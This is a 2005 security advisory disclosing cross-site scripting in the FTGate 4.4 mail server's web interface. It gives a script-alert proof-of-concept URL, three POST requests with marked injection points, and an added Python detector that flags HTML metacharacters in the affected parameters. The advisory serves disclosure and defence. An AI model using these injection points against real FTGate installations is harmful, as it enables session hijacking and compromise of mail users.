<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=us-ascii">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2657.88">
<TITLE>[ACSSEC-2005-11-25-0x3] FTGate 4.4 [Build 4.4.000 Oct 26 2005] Cross Site Scripting Vulnerability</TITLE>
</HEAD>
<BODY>
<BR>
<P><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
<BR><FONT SIZE=2>ACS Security Assessment Advisory - XSS Scripting Vulnerability</FONT>
</P>
<P><FONT SIZE=2>ID: ACSSEC-2005-11-25 - 0x3</FONT>
</P>
<P><FONT SIZE=2>Class: Cross-Site-Scripting (XSS) </FONT>
<BR><FONT SIZE=2>Package: FTGate 4.4 [Build 4.4.000 Oct 26 2005] </FONT>
<BR><FONT SIZE=2>Build: Windows NT/2k/XP/2k3</FONT>
<BR><FONT SIZE=2>Notified: Dec 01, 2005</FONT>
<BR><FONT SIZE=2>Released: Dec 20, 2005</FONT>
</P>
<P><FONT SIZE=2>Remote: Yes</FONT>
<BR><FONT SIZE=2>Severity: Low</FONT>
</P>
<P><FONT SIZE=2>Credit: Tim Shelton &lt;security-advisories@acs-inc.com&gt;</FONT>
<BR><FONT SIZE=2>-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-</FONT>
</P>
<P><FONT SIZE=2>-=[ Background</FONT>
</P>
<P><FONT SIZE=2>FTGate4 is a powerful Windows(TM) communication suite that combines </FONT>
<BR><FONT SIZE=2>exceptional mail handling facilities with comprehensive Groupware </FONT>
<BR><FONT SIZE=2>functionality. Its security and collaboration features were developed </FONT>
<BR><FONT SIZE=2>in conjunction with leading ISPs and define a new era in mail server </FONT>
<BR><FONT SIZE=2>performance.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Technical Description</FONT>
</P>
<P><FONT SIZE=2>FTGate 4.4 [Build 4.4.000 Oct 26 2005] is vulnerable to cross-site </FONT>
<BR><FONT SIZE=2>scripting (XSS) through specially crafted requests. A remote attacker </FONT>
<BR><FONT SIZE=2>could trick a user into viewing a vulnerable page, which could then </FONT>
<BR><FONT SIZE=2>lead to remote compromise.</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ Proofs of Concept</FONT>
</P>
<P><FONT SIZE=2><A HREF="http://127.0.0.1:8089/index.fts?href=" TARGET="_blank">http://127.0.0.1:8089/index.fts?href=</A>&quot;&gt;&lt;script&gt;alert('XSS-magic-string');&lt;/script&gt;</FONT>
</P>
<P><FONT SIZE=2>POST /domains/index.fts </FONT>
<BR><FONT SIZE=2>href=%2Fdomains%2Findex.fts&amp;config=1003&amp;command=0&amp;start=0&amp;param1=Domain+List%2C%2Fdomains%2Findex.fts[STRING INJECTION HERE]&amp;param2=&amp;find=*&amp;elements=10&amp;aliases=1&amp;data0=19</FONT></P>
<P><FONT SIZE=2>POST /config/licence.fts </FONT>
<BR><FONT SIZE=2>href=%2Fconfig%2Flicence.fts&amp;config=1003&amp;command=0&amp;param1=Routing%2C%2Ffilters%2Froutes.fts[STRING INJECTION HERE]&amp;param2=&amp;reg=</FONT></P>
<P><FONT SIZE=2>POST /config/systemacl.fts </FONT>
<BR><FONT SIZE=2>href=%2Fconfig%2Fsystemacl.fts&amp;config=1003&amp;command=0&amp;id=0&amp;param1=System+Timers%2C%2Fschedules%2Findex.fts[STRING INJECTION HERE]&amp;redirect=&amp;data1=32&amp;address=</FONT></P>
<P><FONT SIZE=2>-=[ Solution</FONT>
<BR><FONT SIZE=2>No remedy available as of December 2005.</FONT>
</P>
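<P><FONT SIZE=2>With no vendor fix available, captured requests can be checked for the pattern the proofs of concept share: HTML metacharacters in the href or param1 parameter of a .fts page. The Python below is an added example, not part of the original advisory or of FTGate; it generalizes from the exact strings above to any such value, including multiply URL-encoded ones. The function names, the decode-round limit and the sample body are assumptions constructed for illustration.</FONT>
</P>
<PRE>
```python
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters the advisory's proofs of concept inject into.
WATCHED_PARAMS = {"href", "param1"}
# Characters that let a reflected value close an attribute or open a tag.
HTML_META = set("<>\"'")
MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap double/triple encoding


def fully_decode(value):
    """URL-decode repeatedly so a double-encoded %253C is still seen."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target, body=""):
    """Return the watched parameters whose value carries HTML metacharacters.

    target is the request target (path plus optional query string); body is
    a form-encoded POST body. Only requests for .fts pages are inspected.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".fts"):
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    hits = {
        name
        for name, value in pairs
        if name in WATCHED_PARAMS
        and any(ch in HTML_META for ch in fully_decode(value))
    }
    return sorted(hits)


# Constructed sample: the advisory's first POST with an encoded marker appended.
SAMPLE_BODY = "&".join([
    "href=%2Fdomains%2Findex.fts",
    "config=1003",
    "param1=Domain+List%2C%2Fdomains%2Findex.fts%22%3E%3Cscript%3E",
])

if __name__ == "__main__":
    print(suspicious_params("/domains/index.fts", SAMPLE_BODY))  # ['param1']
```
</PRE>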
<P><FONT SIZE=2>-=[ Credits</FONT>
</P>
<P><FONT SIZE=2>Vulnerability originally reported by Tim Shelton</FONT>
</P>
<BR>
<P><FONT SIZE=2>-=[ ChangeLog</FONT>
</P>
<P><FONT SIZE=2>2005-11-25 : Original Advisory</FONT>
<BR><FONT SIZE=2>2005-12-01 : Notified Vendor</FONT>
<BR><FONT SIZE=2>2005-12-20 : No response from vendor, disclosing full information.</FONT>
</P>
</BODY>
</HTML>